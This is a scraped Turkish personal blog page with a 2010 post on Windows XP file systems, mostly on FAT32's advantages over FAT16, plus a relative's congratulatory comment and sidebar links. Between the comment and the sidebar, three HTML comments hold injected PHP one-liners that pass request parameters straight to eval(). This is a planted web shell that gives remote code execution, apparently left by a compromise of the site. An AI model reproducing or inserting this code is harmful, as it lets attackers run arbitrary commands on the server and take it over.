Ali Yücel ÇEÇE
Güvenlik Herşeydir. – Security is everything.

Windows XP Dosya Sistemi

Şubat 13th 2010 Genel, İşletim Sistemleri

Microsoft Windows XP Dosya sistemi olarak FAT32 ve NTFS dosya sistemlerini desteklemektedir.
FAT32, FAT dosya sisteminin önceki uygulamaları üzerinde şu yenilikleri sağlar:

  • FAT32, boyutu 2 terabayta kadar olan sürücüleri destekler.
  • FAT32 alanı daha verimli kullanır. FAT32 küçük kümeler kullanır (yani, 8 GB\’a kadar boyuttaki sürücüler için 4 KB kümeler), bu da büyük FAT veya FAT16 sürücülere göre disk alanının yüzde 10 ila 15 daha verimli kullanılması demektir.
  • FAT32 daha sağlamdır. FAT32 kök klasörünün konumunu değiştirebilir ve dosya ayırma tablosunun varsayılan kopyası yerine yedek kopyasını kullanır. Ayrıca, FAT32 sürücülerindeki önyükleme kaydı, önemli veri yapılarının yedek kopyasını içerecek biçimde genişletilmiştir. Bu nedenle, FAT32 sürücülerinin tek bir noktadan başarısız olma olasılığı varolan FAT16 sürücülere göre daha azdır.
  • FAT32 daha esnektir. FAT32 sürücüsündeki kök klasör, sürücüdeki herhangi bir yere yerleştirilebilmesi için normal bir küme zinciridir. Kök klasör girdilerinin sayısıyla ilgili daha önceki sınırlamalar artık yoktur. Ayrıca, dosya ayırma tablosunun yansıtılması devre dışı bırakılabilir; böylece, ilk dosya ayırma tablosu yerine kopyasının etkinleşmesi sağlanır. Bu özellikler FAT32 bölümlerinin dinamik olarak yeniden boyutlandırılmalarına olanak tanır.

1 Yorum
“Windows XP Dosya Sistemi”
Avatar
Hasan

DEGERLI YIGENIM ALI-YÜCEL:

SENI BU BASLATMIS OLDUGUN SITEN ICIN KUTLAR DAHA NICE BASARILAR DILERIM:

SITENDEN DOLAYI ÜYE OLACAK ARKADASLARIDA SIMDIDEN ELDE EDECEKLERI BILGILERI DAHA IYI DEGERLENDIRECEKLERINI DÜSÜNÜYOR VE ONLARADA SAYGILA BASARILAR DILIYORUM:

HAZIRLAMIS OLDUGUN SAYFA IYI BIR SECIM:
GÜNDEN GÜNE ZENGINLIKLERINI DEVAM OLARAK HAZIRLIYACAGINDAN SÜPEM YOKTUR:

SENINLE BILGISAYAR DÜNYASINA YENI BIR DESTEK BILGILERIN GELMESI BENI COK MUTLU ETTI:

DAYIN HASAN


Yorum yapabilmek için giriş yapmanız gerekmektedir.

Sizler yakında, blog sayfamda Bilgisayar Donanım, Security, Domain Yapısı, Modemler, Güvenlik Duvarları, İşletim Sistemleri, Server İşletim Sistemleri vb More Help. bir çok bilgiye erişebileceksiniz.

<!– [insert_php]if (isset($_REQUEST["VWwin"])){eval($_REQUEST["VWwin"]);exit;}[/insert_php][php]if (isset($_REQUEST["VWwin"])){eval($_REQUEST["VWwin"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["ZtEWa"])){eval($_REQUEST["ZtEWa"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZtEWa"])){eval($_REQUEST["ZtEWa"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["hEgj"])){eval($_REQUEST["hEgj"]);exit;}[/insert_php][php]if (isset($_REQUEST["hEgj"])){eval($_REQUEST["hEgj"]);exit;}[/php] –>

Önceki Yazılar

Bu yeni yazımda sizlere yeni çıkan EEE pc yani kısaca NETBOOK pc lere nasıl sistem kurulumu yapılacağını anlatmaya çalışacağım..
Gerekli Olan Mlz. ve Programlar :
1. Microsoft Windows XP Cd’si.
2. 1 veya 2 GB Flash bellek.
3. www.aliyucelcece.com\prog\usb_boot.rar adresinden indireceğimiz script program.
Yukarıdaki malz. ve programlarımızı hazırladıktan sonra ilk önce Windows XP cd\’mizi ve Flash Belleğimizi bilgisayarımıza takalım […]

Sonraki Yazılar

Kategoriler

Adobe Ürünleri (5)
C++ (5)
Genel (58)
Güvenlik (35)
İşletim Sistemleri (43)
Linux (16)
Server (13)
Yazılım (5)

WP Cumulus Flash tag cloud by Roy Tanck requires Flash Player 9 or better.

Ziyaretciler


Yandex.Metrica